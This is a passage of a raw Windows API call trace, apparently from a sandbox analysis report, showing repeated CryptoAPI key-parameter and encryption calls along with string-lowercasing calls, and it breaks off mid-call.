CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.497] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb438, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb438*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.497] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.497] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.497] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.497] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.497] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb498*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb498*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.497] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.497] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.497] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb4b8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb4b8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.498] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.498] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.498] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.498] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.498] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb5c8*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb5c8*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.498] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.498] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.498] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb558, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb558*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.498] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.498] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.498] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.498] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.499] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb488*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb488*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.499] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.499] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.499] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb498, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb498*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.499] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.499] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.499] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.500] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.500] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb568*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb568*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.500] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.500] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.500] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb5c8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb5c8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.500] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.500] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.500] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.500] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.500] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb648*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb648*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.500] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.500] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.500] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb488, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb488*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.501] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.501] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.501] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.501] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.501] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb3b8*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb3b8*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.501] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.501] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.501] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb568, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb568*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.501] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.501] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.502] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.502] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.502] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb538*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb538*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.502] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.502] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.502] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb648, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb648*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.502] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.502] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.502] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.503] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.503] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb578*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb578*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.503] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.503] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.503] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb3b8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb3b8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.503] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.503] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.503] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.503] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.503] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb438*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb438*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.504] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.504] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.504] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb538, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb538*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.504] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.504] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.504] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.504] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb4b8*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb4b8*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.504] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb578, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb578*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.505] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.505] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb558*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb558*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.509] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb438, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb438*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.509] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.510] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb498*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb498*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.587] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb4b8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb4b8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.588] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.588] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb5c8*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb5c8*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.588] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb558, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb558*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.588] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.588] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb488*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb488*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.588] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb498, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb498*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.589] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.589] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb568*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb568*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.589] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb5c8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb5c8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.589] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.589] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb648*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb648*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.590] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb488, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb488*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.590] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.590] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb3b8*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb3b8*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.590] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb568, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb568*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.590] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.590] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb538*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb538*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.591] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb648, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb648*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.591] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.591] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb578*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb578*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.591] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb3b8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb3b8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.591] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.591] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb438*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb438*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.592] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb538, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb538*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.592] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.592] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb4b8*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb4b8*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.592] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb578, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb578*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.592] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.592] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb558*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb558*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.593] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb438, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb438*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.593] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.593] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb498*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb498*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.593] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb4b8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb4b8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.593] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.593] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb5c8*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb5c8*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.593] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb558, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb558*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.593] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.593] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb488*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb488*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.594] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb498, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb498*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.594] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.594] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb568*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb568*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.594] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb5c8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb5c8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.594] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.594] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb648*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb648*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.595] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb488, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb488*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.595] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.595] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb3b8*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb3b8*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.595] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb568, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb568*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.595] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.596] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb538*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb538*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.596] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb648, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb648*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.596] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.596] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb578*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb578*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.596] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb3b8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb3b8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.596] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.596] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb438*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb438*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.596] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb538, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb538*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.597] CryptEncrypt (in: 